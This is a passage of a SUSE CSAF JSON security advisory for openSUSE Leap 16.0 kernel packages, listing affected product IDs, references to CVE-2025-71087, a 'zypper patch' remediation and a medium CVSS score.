"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71087",
"url": "https://www.suse.com/security/cve/CVE-2025-71087"
},
{
"category": "external",
"summary": "SUSE Bug 1256628 for CVE-2025-71087",
"url": "https://bugzilla.suse.com/1256628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
